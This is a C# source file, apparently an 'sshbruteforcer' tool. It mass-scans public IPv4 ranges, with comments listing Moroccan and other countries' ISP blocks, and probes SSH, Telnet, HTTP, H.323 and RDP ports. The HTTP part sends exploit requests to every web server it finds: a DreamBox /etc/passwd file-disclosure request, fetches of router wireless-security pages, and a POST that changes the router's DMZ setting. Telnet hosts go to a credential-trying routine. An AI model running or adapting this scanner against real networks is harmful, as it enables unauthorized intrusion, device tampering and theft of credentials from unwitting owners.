using System;
using System.Collections;   //ArrayList
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading;

using System.Net.Sockets;
using System.Net;

using Tamir.SharpSsh;

//TODO: http://nion.modprobe.de/blog/archives/704-Exploiting-the-UbiquisysSFR-femtocell-webserver-wsalshttpdmongooseyassl-embedded-webserver.html
//JA
namespace sshbruteforcer
{
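    /// <summary>
    /// Extension helpers for <see cref="IPAddress"/>: a byte-wise AND with a mask, and a
    /// check for loopback and RFC 1918 private IPv4 addresses.
    /// </summary>
    public static class IPAddressMask
    {
        // RFC 1918 blocks as (network address, netmask) pairs. An address belongs to a
        // block when (address AND netmask) equals the network address.
        private static readonly IPAddress network10 = IPAddress.Parse("10.0.0.0");
        private static readonly IPAddress netmask8 = IPAddress.Parse("255.0.0.0");
        private static readonly IPAddress network172 = IPAddress.Parse("172.16.0.0");
        private static readonly IPAddress netmask12 = IPAddress.Parse("255.240.0.0");
        private static readonly IPAddress network192 = IPAddress.Parse("192.168.0.0");
        private static readonly IPAddress netmask16 = IPAddress.Parse("255.255.0.0");

        /// <summary>
        /// Validates both arguments and returns their raw address bytes.
        /// </summary>
        /// <exception cref="ArgumentNullException">Either argument is null.</exception>
        /// <exception cref="ArgumentException">The two addresses have different byte lengths (IPv4 vs IPv6).</exception>
        private static void CheckIPVersion(IPAddress ipAddress, IPAddress mask, out byte[] addressBytes, out byte[] maskBytes)
        {
            // ArgumentNullException derives from ArgumentException, so callers that
            // caught the original ArgumentException for a null mask still do.
            if (ipAddress == null)
            {
                throw new ArgumentNullException("ipAddress");
            }
            if (mask == null)
            {
                throw new ArgumentNullException("mask");
            }

            addressBytes = ipAddress.GetAddressBytes();
            maskBytes = mask.GetAddressBytes();

            if (addressBytes.Length != maskBytes.Length)
            {
                throw new ArgumentException("The address and mask don't use the same IP standard");
            }
        }

        /// <summary>
        /// Returns a new address whose bytes are the bitwise AND of the address bytes and the mask bytes.
        /// </summary>
        /// <param name="ipAddress">Address to mask.</param>
        /// <param name="mask">Mask of the same address family.</param>
        /// <returns>The masked address.</returns>
        /// <exception cref="ArgumentException">An argument is null or the families differ.</exception>
        public static IPAddress And(this IPAddress ipAddress, IPAddress mask)
        {
            byte[] addressBytes;
            byte[] maskBytes;
            CheckIPVersion(ipAddress, mask, out addressBytes, out maskBytes);

            byte[] resultBytes = new byte[addressBytes.Length];
            for (int i = 0; i < addressBytes.Length; ++i)
            {
                resultBytes[i] = (byte)(addressBytes[i] & maskBytes[i]);
            }

            return new IPAddress(resultBytes);
        }

        /// <summary>True when <paramref name="ipAddress"/> lies inside the block described by network and netmask.</summary>
        private static bool IsInBlock(IPAddress ipAddress, IPAddress network, IPAddress netmask)
        {
            return network.Equals(ipAddress.And(netmask));
        }

        /// <summary>
        /// Returns true if the ip address is a loopback address or lies in one of the
        /// IANA-reserved private IPv4 network ranges (RFC 1918):
        ///  Start          End
        ///  10.0.0.0       10.255.255.255
        ///  172.16.0.0     172.31.255.255
        ///  192.168.0.0    192.168.255.255
        /// </summary>
        /// <remarks>
        /// The previous implementation compared the address with itself ANDed against the
        /// range's END address (for example 10.255.255.255). That test only checks that the
        /// address bits are a subset of the end address bits, so public addresses such as
        /// 8.8.8.8 and 128.8.0.1 were reported as private. The check now uses real
        /// network/netmask pairs.
        /// Only loopback and the three RFC 1918 blocks are recognised. Link-local
        /// (169.254.0.0/16), shared address space (100.64.0.0/10) and IPv6 private ranges
        /// are not classified, so this predicate is not a complete "internal address" test
        /// on its own.
        /// </remarks>
        /// <param name="ipAddress">Address to classify.</param>
        /// <returns>True for loopback and RFC 1918 addresses; false for 0.0.0.0 and other IPv4 addresses.</returns>
        /// <exception cref="ArgumentException">
        /// The address is null, or is a non-loopback IPv6 address (the masks are IPv4, so the
        /// family mismatch is reported rather than silently answered).
        /// </exception>
        public static bool IsOnIntranet(this IPAddress ipAddress)
        {
            if (ipAddress == null)
            {
                throw new ArgumentNullException("ipAddress");
            }
            if (IPAddress.Any.Equals(ipAddress))
            {
                return false;
            }
            if (IPAddress.IsLoopback(ipAddress))
            {
                return true;
            }

            return IsInBlock(ipAddress, network10, netmask8)
                || IsInBlock(ipAddress, network172, netmask12)
                || IsInBlock(ipAddress, network192, netmask16);
        }
    }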

    public class Program    //(string ipaddress)
    {
    //    public Socket Sock_scan;
        

        // 32767-byte buffer; no code visible in this part of the file reads or writes it.
        private static byte[] m_byBuff = new byte[32767];

        // Live-thread count at which go() stops launching workers and waits.
        private int Max_thread = 50;

        private static AsyncCallback callbackProc;
        private static ArrayList m_ListOptions = new ArrayList();

        // Telnet command bytes; names and values match RFC 854.
        private static char IAC = (char)255;    // Interpret As Command
        private static char DO = (char)253;
        private static char DONT = (char)254;
        private static char WILL = (char)251;
        private static char WONT = (char)252;
        private static char SB = (char)250;     // subnegotiation begin
        private static char SE = (char)240;     // subnegotiation end

        // Completion signals; in the visible code they are referenced only from
        // commented-out asynchronous connect/receive paths.
        private static ManualResetEvent connectDone = new ManualResetEvent(false);
        private static ManualResetEvent sendDone = new ManualResetEvent(false);
        private static ManualResetEvent receiveDone = new ManualResetEvent(false);

        // The response from the remote device.
        private static string response = string.Empty;

        // Counter of running worker threads, shared by go() and every Scanner_ip_port.
        public static Compteur_thread cpt_th = new Compteur_thread();

        // Constructor arguments; nothing in the visible code reads them back.
        private string ipaddress;
        private int portx;

            //public static IPAddress address = IPAddress.Parse("10.20.10.5");
            //bool onTheIntranet = address.IsOnIntranet();
        

        /// <summary>
        /// Stores the two constructor arguments in the instance fields of the same name.
        /// </summary>
        /// <param name="ipaddress">Value kept in <c>ipaddress</c>.</param>
        /// <param name="portx">Value kept in <c>portx</c>.</param>
        public Program(string ipaddress, int portx)
        {
            this.portx = portx;
            this.ipaddress = ipaddress;
        }

        /// <summary>
        /// Entry point: creates a <c>Program</c> and runs its <c>go</c> method on a new thread.
        /// The command-line arguments are not read.
        /// </summary>
        public static void Main(string[] args)
        {
            // "go" and 5 only fill the constructor; go() takes its address range and
            // ports from its own local variables.
            var scanner = new Program("go", 5);
            var worker = new Thread(new ThreadStart(scanner.go));
            worker.Start();
        }

        /// <summary>
        /// Walks IPv4 addresses in ascending order between the hard-coded start octets
        /// (<c>s_ip</c>) and end octets (<c>s2_ip</c>) and, for each address, starts one
        /// thread per probed TCP port running <c>Scanner_ip_port.Scanner_IP_Port</c>:
        /// ports 22 and 23 (the <c>Port_start</c>..<c>Port_end</c> loop), then 80, 443,
        /// 1720 and 3389.
        /// </summary>
        /// <remarks>
        /// Throttling: after every thread start the shared counter <c>cpt_th</c> is
        /// incremented and read back; when the value equals <c>Max_thread</c> the calling
        /// thread blocks in <c>Monitor.Wait(this)</c>. The code that releases the wait is
        /// not in this method (presumably the <c>Lancer_Thread</c> handler subscribed
        /// below; confirm against its definition).
        /// Scope: the range is taken only from the two literal arrays. No allow list is
        /// consulted and <c>IPAddressMask.IsOnIntranet</c> is not called. As written the
        /// start (41.141.1.1) and end (196.12.233.255) sit in different /8 networks, so
        /// the outer loop runs over every first octet from 41 to 196.
        /// Network footprint: one source contacting destination addresses in ascending
        /// numeric order, each receiving TCP connection attempts to 22, 23, 80, 443, 1720
        /// and 3389 in that order, which is a pattern flow logs and IDS sensors can match.
        /// Errors: any exception is caught, written to the console with the prefix
        /// "BADBOY: ", and ends the walk.
        /// </remarks>
        public void go()
        {
        //    CScanner_IP s;
        //    s = new CScanner_IP("41.250.149.1", "41.250.149.254", 21, 25);
 

            byte[] t_IP_start;
            byte[] t_IP_end;

       //     IPAddress MyExternalIp = GetExternalIp();
       //     Console.WriteLine("MyExternalIp=" + MyExternalIp);
       //     string[] s_ip = MyExternalIp.ToString().Split('.');
       //     string[] s2_ip = MyExternalIp.ToString().Split('.');

            string adresse_en_cours;
            

            // Inclusive port range probed by the inner loop (22 and 23).
            int Port_start=22;
            int Port_end=23;

            


            // Neither thread variable is assigned or used in the live code below.
            Thread th_Lance_Scan;
		    Thread th_Scan_ip_port;

            
            // Subscribes this instance's Lancer_Thread handler (defined outside this view)
            // to the shared counter's lancer_thread event.
            cpt_th.lancer_thread += new Program.Compteur_thread.Lancer_Thread(Lancer_Thread);

            //Split start IP
            //196.28.249.---    Burkina Faso
            //41.202.193.---    Cameroon
            //195.24.206.---    Cameroon
            //90.4.125.---      France
            //202.152.43.---    Indonesia
            //202.159.126.---   Indonesia

            //http://www.programva.com/en/list-of-ip-addresses-world-countries?user_0=%20Morocco%20MA%20MAR&user_a=ip%20addresses:%20&user_b=list%20of%20ip%20address&id_r=138&opEvent=country&opEventChild=
    
            //41.214
            string[] s_ip = { "41", "141", "1", "1" };    //zawi    41.250.195.107 
    //string[] s_ip={"41", "250", "75", "1"};    //zawi    41.250.195.107  
    //string[] s_ip = { "81", "192", "102", "1" };  //Maroc Telecom fixed IP   81.192.102.8: netpeas     81.192.152.205: cnia
            //41.248.0
            //41.248.158.92
            //string[] s_ip = { "41", "141", "235", "1" };    //example:  41.141.235.82
            //41.141.55.16  Agadir
            //41.143.11.192
            //41.250.59.57
            //41.250.118.53
            //41.250.129.142
            //string[] s_ip = { "41", "250", "82", "159" };    //example:   41.250.82.159
    //        string[] s_ip = { "196", "12", "232", "1" };       //196.12.232.120 <snip> location
            //196.206.198.10    Rabat
            //string[] s_ip = { "41", "250", "136", "1" };    //<snip> location   41.250.136.238
            //string[] s_ip = { "41", "250", "150", "18" }; 
            //string[] s_ip = { "41", "250", "195", "1"};    //zawi    41.250.195.107
            //string[] s_ip = { "41", "251", "16", "1" };    //<snip> location   41.251.16.238
            //string[] s_ip = { "91", "121", "78", "55" };    //OVH   91.121.78.55
            //http://www.robtex.com/dns/adsl.iam.net.ma.html#records
            //string[] s_ip = { "196", "217", "240", "1" };    //MENARA (mail)
            //string[] s_ip = { "81", "192", "48", "1" };    //MENARA (dns)
            //string[] s_ip = { "212", "217", "0", "1" };    //MENARA
            
            // Start address as four octets; Convert.ToByte throws on a value outside 0..255.
            t_IP_start = new byte[4];
       //     for (int i = 0; i < s_ip.Length; i++)
       //         t_IP_start[i] = Convert.ToByte(s_ip[i]);
            t_IP_start[0] = Convert.ToByte(s_ip[0]);
            t_IP_start[1] = Convert.ToByte(s_ip[1]);
            t_IP_start[2] = Convert.ToByte(s_ip[2]);
            t_IP_start[3] = Convert.ToByte(s_ip[3]);
            //t_IP_start[3] = Convert.ToByte("1");

            //string[] s2_ip={"41", "250", "149", "254"}; //zawi
//    string[] s2_ip={"41", "251", "254", "254"}; //zawi
          string[] s2_ip = { "196", "12", "233", "255" };       //196.12.232.120 <snip> location
            //string[] s2_ip = { "41", "251", "16", "254" }; //<snip> location     41.251.35.72
            //string[] s2_ip = { "41", "141", "235", "254" };    //<snip> location  41.141.235.82
            //string[] s2_ip = { "91", "121", "78", "55" };    //OVH   91.121.78.55
//            string[] s2_ip = { "41", "250", "150", "19" };
            //string[] s2_ip = { "196", "217", "255", "255" };    //MENARA (mail)
            //string[] s2_ip = { "81", "192", "63", "255" };    //MENARA (dns)
            //string[] s2_ip = { "212", "217", "31", "255" };    //MENARA
            
            // End address as four octets.
            t_IP_end = new byte[4];
       //     for (int i = 0; i < s_ip.Length; i++)
       //         t_IP_end[i] = Convert.ToByte(s2_ip[i]);
            t_IP_end[0] = Convert.ToByte(s2_ip[0]);
            t_IP_end[1] = Convert.ToByte(s2_ip[1]);
            t_IP_end[2] = Convert.ToByte(s2_ip[2]);
            t_IP_end[3] = Convert.ToByte(s2_ip[3]);
            //t_IP_end[3] = Convert.ToByte("255");

//          private void Lancer_Scan()
//		    {
			    // i, j, k, l are the four octets of the current address; max_j/k/l are the
			    // inclusive upper bounds of the three inner loops. Each start_* flag is true
			    // only until the matching inner loop has completed once: on that first pass
			    // the octet starts at the start address's value, afterwards at 0.
			    // NOTE(review): the first-pass bounds compare only the adjacent start/end
			    // octets, not the whole prefix; boundary behaviour has not been verified.
			    int i=0, j=0, k=0, l=0;
			    int max_j=0, max_k=0, max_l=0;
			    bool start_j = true;
			    bool start_k = true;
			    bool start_l = true;
		
			    try
			    {

				//    Info_Scan infs = new Info_Scan(IP_start, IP_end, Port, "Debut du scan", "");
                    //Console.WriteLine("Debut du scan");
//				    if(init_scan != null)init_scan(this, infs);

				    for(i = t_IP_start[0];i <= t_IP_end[0]; i++)
				    {
					    // Choose the second-octet range for this first octet.
					    if((start_j) && (t_IP_start[0] != t_IP_end[0]))
					    {
						    j = t_IP_start[1];
						    max_j = 255;
					    }
					    if((start_j) && (t_IP_start[0] == t_IP_end[0]))
					    {
						    j = t_IP_start[1];
						    max_j = t_IP_end[1];
					    }

					    if((!start_j) && (i != t_IP_end[0]))
					    {
						    j = 0;
						    max_j = 255;
					    }
					    if((!start_j) && (i == t_IP_end[0]))
					    {
						    j = 0;
						    max_j = t_IP_end[1];
					    }

					    for( ;j <= max_j; j++)
					    {

						    // Choose the third-octet range for this second octet.
						    if((start_k) && (t_IP_start[1] != t_IP_end[1]))
						    {
							    k = t_IP_start[2];
							    max_k = 255;
						    }
						    if((start_k) && (t_IP_start[1] == t_IP_end[1]))
						    {
							    k = t_IP_start[2];
							    max_k = t_IP_end[2];
						    }

						    if((!start_k) && (j != t_IP_end[1]))
						    {
							    k = 0;
							    max_k = 255;
						    }
						    if((!start_k) && (j == t_IP_end[1]))
						    {
							    k = 0;
							    max_k = t_IP_end[2];
						    }

						    for( ;k <= max_k; k++)
						    {

							    // Choose the fourth-octet range for this third octet.
							    if((start_l) && (t_IP_start[2] != t_IP_end[2]))
							    {
								    l = t_IP_start[3];
								    max_l = 255;
							    }
							    if((start_l) && (t_IP_start[2] == t_IP_end[2]))
							    {
								    l = t_IP_start[3];
								    max_l = t_IP_end[3];
							    }

							    if((!start_l) && (k != t_IP_end[2]))
							    {
								    l = 0;
								    max_l = 255;
							    }
							    if((!start_l) && (k == t_IP_end[2]))
							    {
								    l = 0;
								    max_l = t_IP_end[3];
							    }

							    for( ;l <= max_l; l++)
							    {
								    // Dotted-quad text of the address probed in this iteration.
								    adresse_en_cours = i.ToString() + "." + j.ToString() + "." + k.ToString() + "." + l.ToString();
								
								//    Info_Scan info = new Info_Scan(adresse_en_cours, Port, "starting to scan", "");
                                //    Console.WriteLine("DEBUG Current IP: {0}",adresse_en_cours);
								
								//    if(debut_scan != null)
								//	    debut_scan(this, info);
								
/*
								    Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, Port, this, cpt_th);
*/
                                    int nb_thread = 0;
                                    // One worker thread per port in Port_start..Port_end.
                                    for (int port = Port_start; port <= Port_end; port++)
                                    {
                                        /*
                                        Scanner_IP_Port(adresse_en_cours, port);
                                        th_Scan_ip_port = new Thread(new ThreadStart(Scanner_IP_Port));
                                        th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
                                        th_Scan_ip_port.Start();
                                        */

                                        Scanner_ip_port sc = new Scanner_ip_port(adresse_en_cours, port, cpt_th);

                                        Thread t = new Thread(new ThreadStart(sc.Scanner_IP_Port));
                                        t.Start();

                                        // Count the new worker, read the total back, and block
                                        // on this object's monitor when the total equals
                                        // Max_thread. The same sequence is repeated verbatim
                                        // after each of the four fixed-port launches below.
                                        cpt_th.Incrementer();
                                        nb_thread = 0;
                                        cpt_th.Nb_thread(out nb_thread);
                                        if (nb_thread == this.Max_thread)
                                        {
                                            lock (this)
                                            {
                                            //    Console.WriteLine("DEBUG WAIT1");
                                                Monitor.Wait(this);                                                
                                            }
                                        }
                                    }

                                    //http scan
                                    
                                    Scanner_ip_port sc2 = new Scanner_ip_port(adresse_en_cours, 80, cpt_th);

                                    Thread t2 = new Thread(new ThreadStart(sc2.Scanner_IP_Port));
                                    t2.Start();

                                    cpt_th.Incrementer();
                                    nb_thread = 0;
                                    cpt_th.Nb_thread(out nb_thread);
                                    if (nb_thread == this.Max_thread)
                                    {
                                        lock (this)
                                        {
                                        //    Console.WriteLine("DEBUG WAIT2");
                                            Monitor.Wait(this);
                                        }
                                    }
                                    

                                    //https scan
                                    
                                    Scanner_ip_port sc3 = new Scanner_ip_port(adresse_en_cours, 443, cpt_th);

                                    Thread t3 = new Thread(new ThreadStart(sc3.Scanner_IP_Port));
                                    t3.Start();

                                    cpt_th.Incrementer();
                                    nb_thread = 0;
                                    cpt_th.Nb_thread(out nb_thread);
                                    if (nb_thread == this.Max_thread)
                                    {
                                        lock (this)
                                        {
                                            //Console.WriteLine("DEBUG WAIT2");
                                            Monitor.Wait(this);
                                        }
                                    }

                                    //VIDEO H.323 scan : ref.: HD MOORE (Rapid7)
                                    Scanner_ip_port sc1720 = new Scanner_ip_port(adresse_en_cours, 1720, cpt_th);

                                    Thread t1720 = new Thread(new ThreadStart(sc1720.Scanner_IP_Port));
                                    t1720.Start();

                                    cpt_th.Incrementer();
                                    nb_thread = 0;
                                    cpt_th.Nb_thread(out nb_thread);
                                    if (nb_thread == this.Max_thread)
                                    {
                                        lock (this)
                                        {
                                            //Console.WriteLine("DEBUG WAIT2");
                                            Monitor.Wait(this);
                                        }
                                    }
                                    

                                    //RDP scan
                                    Scanner_ip_port sc3389 = new Scanner_ip_port(adresse_en_cours, 3389, cpt_th);

                                    Thread t3389 = new Thread(new ThreadStart(sc3389.Scanner_IP_Port));
                                    t3389.Start();

                                    cpt_th.Incrementer();
                                    nb_thread = 0;
                                    cpt_th.Nb_thread(out nb_thread);
                                    if (nb_thread == this.Max_thread)
                                    {
                                        lock (this)
                                        {
                                            //Console.WriteLine("DEBUG WAIT2");
                                            Monitor.Wait(this);
                                        }
                                    }
                                    
/*
								    sc.scan_en_cours += new Scanner_IP.Scanner_ip_port.Scan_en_cours(Ev_scan_en_cours);
								    th_Scan_ip_port = new Thread(new ThreadStart(sc.Scanner_IP_Port));
								    th_Scan_ip_port.Name = adresse_en_cours + ":" + Port.ToString();
								    th_Scan_ip_port.Start();						
								
								    cpt_th.Incrementer();
								    int nb_thread = 0;
								    cpt_th.Nb_thread(out nb_thread);
*/

    /*							
								    if((this.i_progress == this.pas_a_atteindre) && (this.i_progress <= this._ECART_IP_))
								    {
									    Info_Scan ifs = new Info_Scan(adresse_en_cours, Port, "", "", (int)(this.pct_progress * 100));
									    if(this.maj_prg_bar != null)
										    this.maj_prg_bar(this, ifs);

									    this.pas_a_atteindre += this.pas_progress;
								    }

								    i_progress++;
    */
								    
/*                                    
                                    if(nb_thread == this.Max_thread)
								    {
									    lock(this)
									    {
										    Monitor.Wait(this);
									    }

									    if(this.ARRETER_SCAN)
									    {
										    Info_Scan inf_s = new Info_Scan("", 0, "", "Arrêt du scan");
										    if(fin_scan != null)fin_scan(this, inf_s);

										    return;                                        
									    }
								    }
*/
							    }
							    start_l = false;
						    }
						    start_k = false;
					    }
					    start_j = false;
				    }

				//    Info_Scan inf = new Info_Scan("", 0, "", "Fin du scan");
				//    if(fin_scan != null)fin_scan(this, inf);
			    }
			    catch(Exception e)
			    {
				    // Any failure in the walk is printed and ends it; nothing is rethrown.
				    Console.WriteLine("BADBOY: "+e.ToString());
			    }
//		    }

            



        }

        /// <summary>
        /// One probe of a single address/port pair, meant to run on its own thread.
        /// Holds the target address text, the port, and the shared thread counter that is
        /// decremented when the probe ends.
        /// </summary>
        public class Scanner_ip_port
        {
            string adresse_ip;
            int port;

            Compteur_thread cpt_th;




            /// <summary>Stores the target address, the port and the shared thread counter.</summary>
            public Scanner_ip_port(string adresse_ip, int port, Compteur_thread cpt_th)
            {
                this.adresse_ip = adresse_ip;
                this.port = port;
                this.cpt_th = cpt_th;
            }

            /// <summary>
            /// Opens a blocking TCP connection to the target, prints that the port is open,
            /// reads and prints whatever the peer sends first (the "banner"), then runs a
            /// port-specific follow-up and decrements the shared thread counter.
            /// </summary>
            /// <remarks>
            /// Port 21 and 22: the socket is closed; the follow-up calls are commented out.
            /// Port 23: up to two further reads look for a login or password prompt, the
            /// socket is closed, and <c>telnettry(adresse_ip, banner)</c> (defined outside
            /// this view) is called unless the banner is the ACL-denial message.
            /// Port 80: five HTTP requests are sent to fixed paths and each response's
            /// status, headers and body are printed. In web-server and proxy logs these
            /// appear from one client in this order: GET /password.cgi,
            /// GET /file?file=/etc/passwd, GET /wlcfg.html, GET /wlsecurity.html,
            /// POST /scdmz.html?address=192.168.1.2 with body "address=192.168.1.2".
            /// Ports 443, 1720 and 3389 have no branch: connect and banner read only.
            /// Resource handling: Sock_scan is closed only in the port 21, 22 and 23
            /// branches, and the HTTP responses and readers are never closed or disposed.
            /// Errors: every exception is swallowed after decrementing the counter, so a
            /// refused connection, a read error and an HTTP error status are
            /// indistinguishable to the caller, and the first failing HTTP request skips
            /// the remaining ones.
            /// </remarks>
            public void Scanner_IP_Port()
            {
                try
                {
                //    Console.WriteLine("DEBUG SCANNING: " + adresse_ip.ToString());

                    IPAddress adresseIP = IPAddress.Parse(adresse_ip);
                    IPEndPoint ip = new IPEndPoint(adresseIP, port);
                    Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                    //Sock_scan.Blocking = false;
                    // Connect to the remote endpoint.
                    // Synchronous connect: a failure throws and lands in the catch below.
                    Sock_scan.Connect(ip);
               /*asynchronous     
                    try
                    {
                        Sock_scan.BeginConnect(ip, new AsyncCallback(ConnectCallback), Sock_scan);
                    }
                    catch (Exception e)
                    {
                        Console.WriteLine("DEBUG BEGINCONNECT: "+e);
                    }
                    Console.WriteLine("DEBUG RACHEL");
                    connectDone.WaitOne(1000);
               asynchronous*/

                    //    Info_Scan info = new Info_Scan(adresse_ip, port, "Port ouvert", "", ind, Resultat_Scan.reussite);
                    Console.WriteLine("{0} -> Port {1} open", adresse_ip, port);
                    //    if (scan_en_cours != null) scan_en_cours(this, info);


                    /*
                    Byte[] RecvBytes = new Byte[256];
                    String strRetPage = null;
                    Int32 bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                    Encoding ASCII = Encoding.ASCII;
                    strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

                    while (bytes > 0)
                    {
                        bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
                        strRetPage = ASCII.GetString(RecvBytes, 0, bytes);
                    }
                    Console.WriteLine(strRetPage);
                    */
                    // data is reused for every read; each read replaces banner with the
                    // ASCII decoding of the bytes just received (at most 4096).
                    byte[] data = new byte[4096];
                    string banner;
                    int recv;
                    /*
                    NetworkStream ns = new NetworkStream(Sock_scan);
                    if (ns.CanRead)
                    {
                        recv = ns.Read(data, 0, data.Length);
                        stringData = Encoding.ASCII.GetString(data, 0, recv);
                        Console.WriteLine("== BANNER START =======================");
                        Console.WriteLine(stringData);
                        Console.WriteLine("== BANNER END =======================");
                    }
                    else
                    {
                        Console.WriteLine("Error: Can't read from this socket");
                        ns.Close();
                    //    server.Close();
                    //    return;
                    }
                    */

                    // Receive the response from the remote device.
                    // Nothing has been sent yet, and no receive timeout is set in this
                    // method, so this call waits for the peer to speak or to close.
                    /*synchro*/
                    recv = Sock_scan.Receive(data);
                    banner = Encoding.ASCII.GetString(data, 0, recv);
                    // The peer-supplied banner is concatenated into the format string, so
                    // braces in it are parsed as format items by Console.WriteLine.
                    Console.WriteLine("{0}:{1} -> BANNER01: " + banner, adresse_ip, port);

                    // An empty banner (zero bytes received) triggers one more read.
                    if (banner == "")
                    {
                        recv = Sock_scan.Receive(data);
                        banner = Encoding.ASCII.GetString(data, 0, recv);
                        Console.WriteLine("{0}:{1} -> BANNER02: " + banner, adresse_ip, port);
                    }

                    /*synchro*/

                    /*asynchro
                    Receive(Sock_scan);
                    receiveDone.WaitOne(1000);
                    // Write the response to the console.
                    Console.WriteLine("Response received : {0}", response);
                        banner = response;
                    asynchro*/




                                        
                    

                    if (port == 21)
                    {
                        Sock_scan.Close();
                    //    ftptry(adresse_ip);              
                    }
                    if (port == 22)
                    {
                        Sock_scan.Close();
                    //   sshtry(adresse_ip);
                    }
                    if (port == 23)
                    {
                        // "ogin:" / "assword:" match the prompt regardless of the case of
                        // its first letter. If no prompt or ACL message has arrived yet,
                        // read again, up to two more times.
                        if (banner.Contains("ogin:") || banner.Contains("assword:") || banner.Contains("Connection was denied by remote host according to ACL!"))
                        {

                        }
                        else
                        {
                            recv = Sock_scan.Receive(data);
                            banner = Encoding.ASCII.GetString(data, 0, recv);
                            Console.WriteLine("{0}:{1} -> BANNER03: " + banner, adresse_ip, port);
                            if (banner.Contains("ogin:") || banner.Contains("assword:"))
                            {

                            }
                            else
                            {
                                recv = Sock_scan.Receive(data);
                                banner = Encoding.ASCII.GetString(data, 0, recv);
                                Console.WriteLine("{0}:{1} -> BANNER04: " + banner, adresse_ip, port);
                            }
                        }
                        Sock_scan.Close();
                        // A device that refused the connection by ACL is skipped; every
                        // other host is handed to telnettry with the last banner read.
                        if (banner.Contains("Connection was denied by remote host according to ACL!"))
                        {

                        }
                        else
                        {
                            telnettry(adresse_ip, banner);
                        }
                    }
                    if (port == 80)
                    {
                        // Each request below is sent without credentials; GetResponse
                        // throws WebException on an error status, which the outer catch
                        // swallows, so the remaining requests are then not sent.
                        string ResponseText = "";
                        StreamReader SR = null;
                        HttpWebResponse response = null;
                        HttpWebRequest request;
                        request = (HttpWebRequest)HttpWebRequest.Create("http://"+adresse_ip+"/password.cgi");
                        //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

                        request.Method = "GET";
                        //request.ContentType = "application/xml";

                        response = (HttpWebResponse)request.GetResponse();
                        SR = new StreamReader(response.GetResponseStream());
                        ResponseText = SR.ReadToEnd();

                        Console.WriteLine(string.Format("password.cgi response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                        Console.WriteLine(string.Format("password.cgi response headers : [{0}]", response.Headers.ToString()));
                        Console.WriteLine(string.Format("password.cgi response received : [{0}]", ResponseText));

                        //***********************************************************************************************************************************************
                        //DreamBox DM800 <= 1.5rc1 Remote File Disclosure Exploit
                        //http://www.exploit-db.com/exploits/18079/
                        // The log label below says "RFI" while the advisory title above says
                        // file disclosure; the request reads a file, it does not include one.
                        request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/file?file=/etc/passwd");
                        //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

                        request.Method = "GET";
                        //request.ContentType = "application/xml";

                        response = (HttpWebResponse)request.GetResponse();
                        SR = new StreamReader(response.GetResponseStream());
                        ResponseText = SR.ReadToEnd();

                        Console.WriteLine(string.Format("DreamBox RFI response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                        Console.WriteLine(string.Format("DreamBox RFI response headers : [{0}]", response.Headers.ToString()));
                        Console.WriteLine(string.Format("DreamBox RFI response received : [{0}]", ResponseText));

                        
                        //***********************************************************************************************************************************************
                        //108M Wireless ADSL2+ Router
                        //http://41.250.9.119/wlcfg.html   //Wireless/Basic
                        //http://41.250.9.119/wlsecurity.html   //Wireless/Security

                        request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlcfg.html");
                        //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

                        request.Method = "GET";
                        //request.ContentType = "application/xml";

                        response = (HttpWebResponse)request.GetResponse();
                        SR = new StreamReader(response.GetResponseStream());
                        ResponseText = SR.ReadToEnd();

                        Console.WriteLine(string.Format("wlcfg.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                        Console.WriteLine(string.Format("wlcfg.html response headers : [{0}]", response.Headers.ToString()));
                        Console.WriteLine(string.Format("wlcfg.html response received : [{0}]", ResponseText));
                        //***********************************************************************************************************************************************
                        request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/wlsecurity.html");
                        //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

                        request.Method = "GET";
                        //request.ContentType = "application/xml";

                        response = (HttpWebResponse)request.GetResponse();
                        SR = new StreamReader(response.GetResponseStream());
                        ResponseText = SR.ReadToEnd();

                        Console.WriteLine(string.Format("wlsecurity.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                        Console.WriteLine(string.Format("wlsecurity.html response headers : [{0}]", response.Headers.ToString()));
                        Console.WriteLine(string.Format("wlsecurity.html response received : [{0}]", ResponseText));
                        //***********************************************************************************************************************************************
                        //http://41.250.9.119/scdmz.html    //DMZ
                        // Unlike the four GETs above, this request is a POST that submits an
                        // address value to the device's DMZ page; presumably it changes the
                        // device's DMZ setting if accepted (confirm against the device).
                        // No Content-Type is set on the request.
                        request = (HttpWebRequest)HttpWebRequest.Create("http://" + adresse_ip + "/scdmz.html?address=192.168.1.2");    //dmzAddr
                        //ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(ValidateServerCertificate);

                        request.Method = "POST";
                        //request.ContentType = "application/xml";

                        string postData = "address=192.168.1.2";
                        byte[] byteArray = Encoding.UTF8.GetBytes(postData);
                        request.ContentLength = byteArray.Length;

                        Stream dataStream = request.GetRequestStream();
                        dataStream.Write(byteArray, 0, byteArray.Length);
                        dataStream.Close();

                        response = (HttpWebResponse)request.GetResponse();
                        SR = new StreamReader(response.GetResponseStream());
                        ResponseText = SR.ReadToEnd();

                        Console.WriteLine(string.Format("scdmz.html response status : [{0}]", response.StatusCode + " - " + response.StatusDescription));
                        Console.WriteLine(string.Format("scdmz.html response headers : [{0}]", response.Headers.ToString()));
                        Console.WriteLine(string.Format("scdmz.html response received : [{0}]", ResponseText));
                        

                    }

                    // Normal completion: release this worker's slot in the shared counter.
                    cpt_th.Decrementer();

                    //Console.WriteLine("End of scan, stop to drink b33rz dude - " + adresse_ip.ToString());
                }
                catch (Exception e)
